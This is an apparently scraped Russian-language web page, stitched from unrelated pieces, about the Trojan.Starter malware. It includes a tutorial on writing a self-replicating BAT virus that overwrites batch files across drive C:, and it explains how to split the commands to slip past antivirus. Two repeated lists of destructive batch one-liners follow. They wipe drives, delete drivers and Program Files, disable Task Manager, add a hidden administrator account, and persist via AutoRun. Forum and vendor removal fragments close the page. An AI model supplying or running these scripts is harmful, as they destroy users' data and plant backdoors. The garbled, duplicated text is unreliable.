Trojan Starter — что делает вирус, как его удалить
Trojan Starter — компьютерный вирус троянского класса, основная функция которого заключается в скрытии и запуске основного кода другого вредоносного ПО. Также по сути своей активности он может быть отнесён к вирусам-маскировщикам (руткитам). Файлы и процессы, заражённые или генерируемые этим зловредом, могут носить различные названия, но чаще всего в них будут присутствовать слова “trojan” или “starter”. Например:
Вирус Trojan Starter детектируется антивирусом Dr.Web
Обозначение Стартер вирусу дает Dr.Web. Как и все троянские программы зловред проникает в систему вместе с другим “нормальным” программным обеспечением. В том числе это могут быть модификации “чистых” программ, в которые злоумышленники добавили вредоносный код.
Сейчас известны случаи заражения вирусом данного типа только устройств под управлением операционных системы Windows. Отчёты об инфицировании Mac OS или ОС на базе Linux не зафиксированы, но на основании этого факта нельзя сказать, что данные системы находятся в полной безопасности.
Сам по себе этот вирус не может нанести вреда компьютеру, так как служит лишь для маскировки и помощи другим зловредам. Если он оказывается в системе один, то часть некоторые антивирусы определяют его как угрозу, а другие — нет. Однако лучше перестраховаться и просканировать систему как можно большим числом антивирусных модулей, чтобы исключить любую угрозу.
Как удалить Trojan Starter
Самые ранние записи об этом вирусе начали появляются в антивирусных базах с 2006 года, поэтому с данной угрозой хорошо справляются все типы антивирусных программ. Это вредоносное ПО вносит достаточно много изменений в системные компоненты ОС:
Trojan.Starter наиболее распространен среди вредоносного ПО
Из-за наличия такого большого числа изменений удалить вирус может быть довольно проблематично. Гораздо проще и эффективнее будет воспользоваться любым комплексным и хорошо зарекомендовавшим себя антивирусным ПО. Помимо антивируса Dr.Web, который детектирует угрозу, это могут быть:
Bat вирус | Бат вирус. Команды
Что такое BAT вирус (БАТ вирус)
БАТ, как скриптовый язык программирования, является достаточно примитивным и значительно уступает даже таким языкам сценариев, как VBS ( Visual Basic Script ). Но пакетные файлы позволяют выполнять достаточно большой объем задач, чтобы создавать на них различных зловредов. Например, можно в пакетном файле прописать команды для удаления системных файлов, что может привести к нестабильности работы системы. Подобное действие — удаление чего-либо, может выполниться и вручную. Скрипт позволяет это автоматизировать.
Важное уточнение. В батниках можно реализовать различные типы зловредов. Это могут быть программы-шутники, которые будут «подшучивать» над пользователем, например, прятать курсор мышки или выполнять перезагрузку компьютера. Такие скрипты будут скорее относиться к категории троянов — программ, выполняющие скрытые, часто небезопасные действия.
Цель же этой статьи — скрипты, которые будут относиться к категории компьютерных вирусов. То есть программы, которые будут находить определенные типы файлов и заражать их. По способу заражения наш скрипт будет соответствовать опасным нерезидентным вирусам. Наша программа будет пролистать все папки, начиная с корня диска С:\\, производя поиск других батников, замещать собой код (текст) атакуемого файла. Нерезидентный означает, что наш зловред будет получать управление только при непосредственном запуске, без возможности находиться постоянно в памяти компьютера.
Также обрати внимание — далее скрипт БАТ вируса будет приведен по частям. Сделано это по причине того, что все директивы, написанные вместе могут детектироваться как вредоносная программа и блокироваться антивирусами или встроенным защитником Windows. Приведенной информации вполне хватит, чтобы собрать своего «зверя».
Команды BAT вируса
Это наша первая команда, которая будет «возглавлять» наш код. Она означает, что при чтении командным интерпретатором нашего батника не будет выводиться на экран его содержимое. Без этой команды на экране компьютера появлялось бы все, что находится внутри сценария. Даже то, что не должно выводиться.
Команда cd меняет текущий каталог. По умолчанию — текущий каталог тот, в котором находится наш батник. Если мы не используем эту команду, то наш БАТ вирус будет искать «цели» для атаки начиная с текущего каталога. Для того, чтобы охватить весь компьютер, мы указываем нашему сценарию, что нужно начинать с корня диска С:\\.
Поиск файлов
Находить «цели» мы будем с помощью следующего кода:
На первый взгляд, это непонятная конструкция, но на самом деле все просто.
Директива FOR указывает нашему сценарию многократное выполнение команд. В нашем случае это поиск всех «целей» в каталоге, после работы с ними переходить к следующему каталогу.
Далее мы вместо терминов «директива» или «команда» относительно FOR будем использовать термин «конструкция», так как будет подразумеваться не только команда FOR, но и ее параметры.
Параметр /r означает, что программа «работает» не только с текущим каталогом, но и со всеми подкаталогами.
Это переменная нашей конструкции FOR. Вернее, здесь переменная одиночная буква (a). Знак процента (%) указывает, что это не просто буква, а переменная. Двойной знак процента (%%) необходим при работе в конструкции FOR. Также особенность использования переменных в конструкции FOR — использование только одиночных букв.
Здесь мы указываем на параметр конструкции для поиска «целей». Ранее мы объявляли переменную filet, в которой находится значение «.bat». Знак процента (%) с обеих сторон переменной это требования работы с переменными в батниках. Можно было сократить код и обойтись без переменных, но это один из вариантов и в нем есть свои плюсы (отладка, например).
Здесь, в круглых скобках, прописывается код, который нужно выполнить.
Изучение FOR
Чтобы лучше понять, что делается в нашей конструкции FOR, немного отойдем от темы. Изучим работу этой команды. Для этого используем еще одну директиву:
Эта команда будет использоваться для вывода на экран сообщений. Ранее мы запрещали командному интерпретатору выводить на экран то, что тот будет читать в нашем скрипте. Директива echo будет указывать, что можно показывать.
Но после запуска наш скрипт мерцнет черным окошком DOSа и погаснет. Чтобы увидеть результат работы программы, добавим в конце команду:
Эта директива останавливает выполнения сценария и будет ожидать нажатие кнопок на клавиатуре.
Ну и еще немного исследования. Вот несколько измененный сценарий:
FOR /r %%a IN (*.bat) DO echo %%a
Тот же сценарий, только без круглых скобок. Заметь — директива echo указывается на одной строке. DOS команды очень требовательны — командный интерпретатор внимательно отслеживает регистры переменных (большие или маленькие символы), пробелы и строчки.
Заражение батников
В нашем случае используем такой код:
Директива copy проводит копирование. Этой командой наш BAT вирус копирует себя вместо той «цели», что нашел. Причем под тем же именем.
Этот символ (знак процента и ноль, без пробела) означает ссылку на самого себя.
Узнал? Это наша переменная конструкции FOR, в которой находится на текущий момент путь до заражаемого файла.
Этот код скрывает результат выполнения команды copy.
Некоторые замечания по БАТ вирусу
Вот в принципе и все. Этого сценария хватает для того, чтобы найти на заражаемом компьютере все файлы нужного типа и выполнить заражение. По сути перезаписать их своим содержимым, без возможности запуска оригинального кода. Но это можно считать хоть и самым примитивным, но все же механизмом заражения.
В данном примере мы не выполняли других функций, кроме как скрытия вывода на экран результатов выполнения директив сценария, изменения текущего каталога на корень диска С:\\, поиска «целей»по маске и перезапись содержимого. Мы могли, например, менять атрибуты заражаемой «цели», чтобы иметь возможность перезаписи файлов с атрибутами «только для чтения». Или мы могли бы запоминать дату и время создания атакуемых файлов и восстанавливать их после заражения, что помогло бы скрываться в системе. Также в наш зловред мог бы прописывать себя в автозагрузку и запускаться при каждом включении компьютера. И так далее, далее, далее. Но цель не в создании «супер» BAT вируса, а только демонстрация основных моментов.
Указанный выше зловред тестировался под ОС Windows 10. В целом, набор команд актуален для всех версий Windows (но это не точно).
При разработки кода возникла интересная ситуация — одна из версий батника была опознана встроенным защитником как вредоносная программа. Все дело в том, что некоторые наборы директив не используются обычными пользователями и характерны для вредоносных программ. Опасный скрипт (по версии встроенного защитника), в конструкции FOR, после слова DO содержал директиву copy (без круглых скобок). Такой сокращенный вариант показался встроенному защитнику опасным. Но после того, как мы несколько изменили код (после слова DO добавили круглые скобки), встроенный защитник перестал ругаться, хоть логика нашего БАТ вируса осталась прежней.
Bat starter 346 что это за вирус
Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
@echo off
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul
Удаляет звуки Windows
@echo off
del «%SystemRoot%\Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
Будет открывать бесконечно Пэинт
😡
Start mspaint
goto x
copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul
reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
Меняет местами кнопки мыши,но обратная смена не возможна)
Удаляет ядро системы
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs
echo do » %systemdrive%\windows\system32\rundll32.v
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t
REG_DWORD /d 1 /f >nul
Вот ещё подборка «вирусов»
Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
Удаление дров
@echo off
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul
Удаляет звуки Windows
@echo off
del «%SystemRoot%\Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
del %0
Будет открывать бесконечно Paint
😡
Start mspaint
goto x
Заражает Autoexec
copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul
reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton
Вирус, создающий ярлыки на флешке
В одном из копицентров универа моя флешка подхватила одного неприятного друга. Смысл в том, что на ней осел вирус и обычного форматирования и даже проверки кюритом не достаточно, чтобы его удалить. В Интернете не нашел действенного решения конкретно для моей флешки, а флешка-то новая, и ещё так хочется ею пользоваться.
В конце концов, полностью проверил комп с флешкой антивирусом и Др.Веб Кюритом, почистил комп от всякой нечисти и заодно удалил этого самого негодяя. Но вскоре он вернулся, точнее он только притворялся, что исчез. Проверил ещё раз хайджеком и сисинфо, логи и архив предоставил,надеюсь поможете мне, а то флешку жалко(
Прикрепленные файлы:
1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,
2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,
— попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
— детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
— дождаться ответа аналитика или хелпера;
3. Если у Вас зашифрованы файлы,
Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.
Что НЕ нужно делать:
— лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
— переустанавливать операционную систему;
— менять расширение у зашифрованных файлов;
— очищать папки с временными файлами, а также историю браузера;
— использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из «Аптечки сисадмина» Dr. Web;
— использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.
Для этого проделайте следующее:
Trojan.BAT.STARTER.AAL
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
(Note: %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.)
Other System Modifications
This Trojan adds the following registry entries as part of its installation routine:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\PortProxy\v4tov4\
tcp
*/65532 = «1.1.1.1/53»
(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)
Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware’s/spyware’s/grayware’s execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Delete this registry value
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer’s registry.
To delete the registry value this malware/grayware created:
Deleting Scheduled Tasks
For Windows 2000, Windows XP, and Windows Server 2003:
For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:
